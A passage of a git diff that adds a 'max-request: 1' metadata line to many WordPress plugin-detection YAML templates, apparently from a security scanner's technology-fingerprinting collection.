+ max-request: 1
plugin_namespace: antispam-bee
wpscan: https://wpscan.com/plugin/antispam-bee
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml
index 116e0c420a..59144c7dd5 100644
--- a/http/technologies/wordpress/plugins/astra-sites.yaml
+++ b/http/technologies/wordpress/plugins/astra-sites.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/astra-sites/
metadata:
+ max-request: 1
plugin_namespace: astra-sites
wpscan: https://wpscan.com/plugin/astra-sites
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/astra-widgets.yaml b/http/technologies/wordpress/plugins/astra-widgets.yaml
index dc4703ef8d..df06ba2f35 100644
--- a/http/technologies/wordpress/plugins/astra-widgets.yaml
+++ b/http/technologies/wordpress/plugins/astra-widgets.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/astra-widgets/
metadata:
+ max-request: 1
plugin_namespace: astra-widgets
wpscan: https://wpscan.com/plugin/astra-widgets
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml
index 1426ac3ef2..2a79d529cc 100644
--- a/http/technologies/wordpress/plugins/autoptimize.yaml
+++ b/http/technologies/wordpress/plugins/autoptimize.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/autoptimize/
metadata:
+ max-request: 1
plugin_namespace: autoptimize
wpscan: https://wpscan.com/plugin/autoptimize
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml
index 78d1651ff4..556a113acc 100644
--- a/http/technologies/wordpress/plugins/backwpup.yaml
+++ b/http/technologies/wordpress/plugins/backwpup.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/backwpup/
metadata:
+ max-request: 1
plugin_namespace: backwpup
wpscan: https://wpscan.com/plugin/backwpup
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml
index f7219b373d..58d9a9d738 100644
--- a/http/technologies/wordpress/plugins/better-search-replace.yaml
+++ b/http/technologies/wordpress/plugins/better-search-replace.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/better-search-replace/
metadata:
+ max-request: 1
plugin_namespace: better-search-replace
wpscan: https://wpscan.com/plugin/better-search-replace
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml
index f688a68f72..6c9c485079 100644
--- a/http/technologies/wordpress/plugins/better-wp-security.yaml
+++ b/http/technologies/wordpress/plugins/better-wp-security.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/better-wp-security/
metadata:
+ max-request: 1
plugin_namespace: better-wp-security
wpscan: https://wpscan.com/plugin/better-wp-security
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
index 00e95c4263..7631e87d78 100644
--- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
+++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/black-studio-tinymce-widget/
metadata:
+ max-request: 1
plugin_namespace: black-studio-tinymce-widget
wpscan: https://wpscan.com/plugin/black-studio-tinymce-widget
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
index 212b2b13c4..c7daa26ac6 100644
--- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
+++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/breadcrumb-navxt/
metadata:
+ max-request: 1
plugin_namespace: breadcrumb-navxt
wpscan: https://wpscan.com/plugin/breadcrumb-navxt
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml
index 6318392c5c..68767e4dce 100644
--- a/http/technologies/wordpress/plugins/breeze.yaml
+++ b/http/technologies/wordpress/plugins/breeze.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/breeze/
metadata:
+ max-request: 1
plugin_namespace: breeze
wpscan: https://wpscan.com/plugin/breeze
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml
index e1a2a186e0..073618936d 100644
--- a/http/technologies/wordpress/plugins/broken-link-checker.yaml
+++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/broken-link-checker/
metadata:
+ max-request: 1
plugin_namespace: broken-link-checker
wpscan: https://wpscan.com/plugin/broken-link-checker
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml
index 23614882a7..6aabc19e9f 100644
--- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml
+++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/child-theme-configurator/
metadata:
+ max-request: 1
plugin_namespace: child-theme-configurator
wpscan: https://wpscan.com/plugin/child-theme-configurator
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml
index 85965337cb..ac80e4f31b 100644
--- a/http/technologies/wordpress/plugins/classic-editor.yaml
+++ b/http/technologies/wordpress/plugins/classic-editor.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/classic-editor/
metadata:
+ max-request: 1
plugin_namespace: classic-editor
wpscan: https://wpscan.com/plugin/classic-editor
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml
index 33d903a1b4..15d7a24755 100644
--- a/http/technologies/wordpress/plugins/classic-widgets.yaml
+++ b/http/technologies/wordpress/plugins/classic-widgets.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/classic-widgets/
metadata:
+ max-request: 1
plugin_namespace: classic-widgets
wpscan: https://wpscan.com/plugin/classic-widgets
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
index 3c6f8f287b..40ccc15b27 100644
--- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
+++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/click-to-chat-for-whatsapp/
metadata:
+ max-request: 1
plugin_namespace: click-to-chat-for-whatsapp
wpscan: https://wpscan.com/plugin/click-to-chat-for-whatsapp
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/cloudflare.yaml b/http/technologies/wordpress/plugins/cloudflare.yaml
index e555bf93d3..425adf0bfe 100644
--- a/http/technologies/wordpress/plugins/cloudflare.yaml
+++ b/http/technologies/wordpress/plugins/cloudflare.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/cloudflare/
metadata:
+ max-request: 1
plugin_namespace: cloudflare
wpscan: https://wpscan.com/plugin/cloudflare
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml
index c3b630cde2..1fad3cee08 100644
--- a/http/technologies/wordpress/plugins/cmb2.yaml
+++ b/http/technologies/wordpress/plugins/cmb2.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/cmb2/
metadata:
+ max-request: 1
plugin_namespace: cmb2
wpscan: https://wpscan.com/plugin/cmb2
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml
index 5c8ce709b6..ebe4ee41a7 100644
--- a/http/technologies/wordpress/plugins/coblocks.yaml
+++ b/http/technologies/wordpress/plugins/coblocks.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/coblocks/
metadata:
+ max-request: 1
plugin_namespace: coblocks
wpscan: https://wpscan.com/plugin/coblocks
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml
index aea47b9e84..5c32110e0e 100644
--- a/http/technologies/wordpress/plugins/code-snippets.yaml
+++ b/http/technologies/wordpress/plugins/code-snippets.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/code-snippets/
metadata:
+ max-request: 1
plugin_namespace: code-snippets
wpscan: https://wpscan.com/plugin/code-snippets
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml
index 78c584c388..09c2e2f360 100644
--- a/http/technologies/wordpress/plugins/coming-soon.yaml
+++ b/http/technologies/wordpress/plugins/coming-soon.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/coming-soon/
metadata:
+ max-request: 1
plugin_namespace: coming-soon
wpscan: https://wpscan.com/plugin/coming-soon
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml
index 2c80d09c27..1a2e8beb3e 100644
--- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml
+++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/complianz-gdpr/
metadata:
+ max-request: 1
plugin_namespace: complianz-gdpr
wpscan: https://wpscan.com/plugin/complianz-gdpr
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
index 4b1b3a8754..706145493c 100644
--- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/contact-form-7-honeypot/
metadata:
+ max-request: 1
plugin_namespace: contact-form-7-honeypot
wpscan: https://wpscan.com/plugin/contact-form-7-honeypot
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml
index 06ad83bdf7..cf6a6ee635 100644
--- a/http/technologies/wordpress/plugins/contact-form-7.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-7.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/contact-form-7/
metadata:
+ max-request: 1
plugin_namespace: contact-form-7
wpscan: https://wpscan.com/plugin/contact-form-7
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
index b20666268f..c039765929 100644
--- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
+++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/contact-form-cfdb7/
metadata:
+ max-request: 1
plugin_namespace: contact-form-cfdb7
wpscan: https://wpscan.com/plugin/contact-form-cfdb7
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml
index b2a097bfe7..a2c92dff4b 100644
--- a/http/technologies/wordpress/plugins/cookie-law-info.yaml
+++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/cookie-law-info/
metadata:
+ max-request: 1
plugin_namespace: cookie-law-info
wpscan: https://wpscan.com/plugin/cookie-law-info
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml
index c71fa258af..41b5d6c854 100644
--- a/http/technologies/wordpress/plugins/cookie-notice.yaml
+++ b/http/technologies/wordpress/plugins/cookie-notice.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/cookie-notice/
metadata:
+ max-request: 1
plugin_namespace: cookie-notice
wpscan: https://wpscan.com/plugin/cookie-notice
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
index 5a98e67597..cca31cc3a9 100644
--- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
+++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/creame-whatsapp-me/
metadata:
+ max-request: 1
plugin_namespace: creame-whatsapp-me
wpscan: https://wpscan.com/plugin/creame-whatsapp-me
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
index 4463174203..ff9c0a49ce 100644
--- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
+++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/creative-mail-by-constant-contact/
metadata:
+ max-request: 1
plugin_namespace: creative-mail-by-constant-contact
wpscan: https://wpscan.com/plugin/creative-mail-by-constant-contact
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml
index cfac0b961b..a76d3306bb 100644
--- a/http/technologies/wordpress/plugins/custom-css-js.yaml
+++ b/http/technologies/wordpress/plugins/custom-css-js.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/custom-css-js/
metadata:
+ max-request: 1
plugin_namespace: custom-css-js
wpscan: https://wpscan.com/plugin/custom-css-js
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml
index 814e603d75..d6200aaea4 100644
--- a/http/technologies/wordpress/plugins/custom-fonts.yaml
+++ b/http/technologies/wordpress/plugins/custom-fonts.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/custom-fonts/
metadata:
+ max-request: 1
plugin_namespace: custom-fonts
wpscan: https://wpscan.com/plugin/custom-fonts
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
index 0def6e61ca..b5389b27c9 100644
--- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
+++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/custom-post-type-ui/
metadata:
+ max-request: 1
plugin_namespace: custom-post-type-ui
wpscan: https://wpscan.com/plugin/custom-post-type-ui
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml
index 5c5decc127..00d183f507 100644
--- a/http/technologies/wordpress/plugins/disable-comments.yaml
+++ b/http/technologies/wordpress/plugins/disable-comments.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/disable-comments/
metadata:
+ max-request: 1
plugin_namespace: disable-comments
wpscan: https://wpscan.com/plugin/disable-comments
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml
index a8229a338e..451e1daef1 100644
--- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/disable-gutenberg/
metadata:
+ max-request: 1
plugin_namespace: disable-gutenberg
wpscan: https://wpscan.com/plugin/disable-gutenberg
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml
index 6559e64dce..af30ca76b6 100644
--- a/http/technologies/wordpress/plugins/duplicate-page.yaml
+++ b/http/technologies/wordpress/plugins/duplicate-page.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/duplicate-page/
metadata:
+ max-request: 1
plugin_namespace: duplicate-page
wpscan: https://wpscan.com/plugin/duplicate-page
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml
index a4368b8aa6..93823466d4 100644
--- a/http/technologies/wordpress/plugins/duplicate-post.yaml
+++ b/http/technologies/wordpress/plugins/duplicate-post.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/duplicate-post/
metadata:
+ max-request: 1
plugin_namespace: duplicate-post
wpscan: https://wpscan.com/plugin/duplicate-post
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml
index ec119e762a..e224283ecd 100644
--- a/http/technologies/wordpress/plugins/duplicator.yaml
+++ b/http/technologies/wordpress/plugins/duplicator.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/duplicator/
metadata:
+ max-request: 1
plugin_namespace: duplicator
wpscan: https://wpscan.com/plugin/duplicator
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
index b7ec7576a3..9af8df08a7 100644
--- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
+++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/duracelltomi-google-tag-manager/
metadata:
+ max-request: 1
plugin_namespace: duracelltomi-google-tag-manager
wpscan: https://wpscan.com/plugin/duracelltomi-google-tag-manager
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/easy-fancybox.yaml b/http/technologies/wordpress/plugins/easy-fancybox.yaml
index c42d679973..d4081474c3 100644
--- a/http/technologies/wordpress/plugins/easy-fancybox.yaml
+++ b/http/technologies/wordpress/plugins/easy-fancybox.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/easy-fancybox/
metadata:
+ max-request: 1
plugin_namespace: easy-fancybox
wpscan: https://wpscan.com/plugin/easy-fancybox
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/easy-google-fonts.yaml b/http/technologies/wordpress/plugins/easy-google-fonts.yaml
index c9859e9770..96c813ad49 100644
--- a/http/technologies/wordpress/plugins/easy-google-fonts.yaml
+++ b/http/technologies/wordpress/plugins/easy-google-fonts.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/easy-google-fonts/
metadata:
+ max-request: 1
plugin_namespace: easy-google-fonts
wpscan: https://wpscan.com/plugin/easy-google-fonts
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
index fc44375947..bcbc0707fb 100644
--- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
+++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/easy-table-of-contents/
metadata:
+ max-request: 1
plugin_namespace: easy-table-of-contents
wpscan: https://wpscan.com/plugin/easy-table-of-contents
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
index a1616c1741..8b23832297 100644
--- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
+++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/easy-wp-smtp/
metadata:
+ max-request: 1
plugin_namespace: easy-wp-smtp
wpscan: https://wpscan.com/plugin/easy-wp-smtp
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml
index 6cfb8bc272..f0c3e4bc63 100644
--- a/http/technologies/wordpress/plugins/elementor.yaml
+++ b/http/technologies/wordpress/plugins/elementor.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/elementor/
metadata:
+ max-request: 1
plugin_namespace: elementor
wpscan: https://wpscan.com/plugin/elementor
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml
index 9caaa53263..eab4a0d725 100644
--- a/http/technologies/wordpress/plugins/elementskit-lite.yaml
+++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/elementskit-lite/
metadata:
+ max-request: 1
plugin_namespace: elementskit-lite
wpscan: https://wpscan.com/plugin/elementskit-lite
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml
index 5e6b557952..74c172ac94 100644
--- a/http/technologies/wordpress/plugins/enable-media-replace.yaml
+++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/enable-media-replace/
metadata:
+ max-request: 1
plugin_namespace: enable-media-replace
wpscan: https://wpscan.com/plugin/enable-media-replace
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml
index c5a665e6f7..f5a63a2ed2 100644
--- a/http/technologies/wordpress/plugins/envato-elements.yaml
+++ b/http/technologies/wordpress/plugins/envato-elements.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/envato-elements/
metadata:
+ max-request: 1
plugin_namespace: envato-elements
wpscan: https://wpscan.com/plugin/envato-elements
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
index a8b56b5df0..25ca7328ef 100644
--- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
+++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/essential-addons-for-elementor-lite/
metadata:
+ max-request: 1
plugin_namespace: essential-addons-for-elementor-lite
wpscan: https://wpscan.com/plugin/essential-addons-for-elementor-lite
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
index 4e20e57107..cb1db5bee6 100644
--- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
+++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/ewww-image-optimizer/
metadata:
+ max-request: 1
plugin_namespace: ewww-image-optimizer
wpscan: https://wpscan.com/plugin/ewww-image-optimizer
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
index 6f6a416595..a3207ea16a 100644
--- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/facebook-for-woocommerce/
metadata:
+ max-request: 1
plugin_namespace: facebook-for-woocommerce
wpscan: https://wpscan.com/plugin/facebook-for-woocommerce
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml
index 2dd0ef57b5..2a4b772078 100644
--- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml
+++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/fast-indexing-api/
metadata:
+ max-request: 1
plugin_namespace: fast-indexing-api
wpscan: https://wpscan.com/plugin/fast-indexing-api
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
index 11942f4fa4..366205085d 100644
--- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
+++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/favicon-by-realfavicongenerator/
metadata:
+ max-request: 1
plugin_namespace: favicon-by-realfavicongenerator
wpscan: https://wpscan.com/plugin/favicon-by-realfavicongenerator
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml
index 87c2aeb4bd..598f08ce88 100644
--- a/http/technologies/wordpress/plugins/flamingo.yaml
+++ b/http/technologies/wordpress/plugins/flamingo.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/flamingo/
metadata:
+ max-request: 1
plugin_namespace: flamingo
wpscan: https://wpscan.com/plugin/flamingo
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml
index 3696eefbf7..42cdfb4475 100644
--- a/http/technologies/wordpress/plugins/fluentform.yaml
+++ b/http/technologies/wordpress/plugins/fluentform.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/fluentform/
metadata:
+ max-request: 1
plugin_namespace: fluentform
wpscan: https://wpscan.com/plugin/fluentform
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml
index 8bab0a9c3e..a1af263dbd 100644
--- a/http/technologies/wordpress/plugins/font-awesome.yaml
+++ b/http/technologies/wordpress/plugins/font-awesome.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/font-awesome/
metadata:
+ max-request: 1
plugin_namespace: font-awesome
wpscan: https://wpscan.com/plugin/font-awesome
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
index affd270123..19265f910e 100644
--- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
+++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/force-regenerate-thumbnails/
metadata:
+ max-request: 1
plugin_namespace: force-regenerate-thumbnails
wpscan: https://wpscan.com/plugin/force-regenerate-thumbnails
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml
index 1e6a62e23b..c21d414695 100644
--- a/http/technologies/wordpress/plugins/formidable.yaml
+++ b/http/technologies/wordpress/plugins/formidable.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/formidable/
metadata:
+ max-request: 1
plugin_namespace: formidable
wpscan: https://wpscan.com/plugin/formidable
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml
index 980265f531..91c89d0ad8 100644
--- a/http/technologies/wordpress/plugins/forminator.yaml
+++ b/http/technologies/wordpress/plugins/forminator.yaml
@@ -7,6 +7,7 @@ info:
reference:
- https://wordpress.org/plugins/forminator/
metadata:
+ max-request: 1
plugin_namespace: forminator
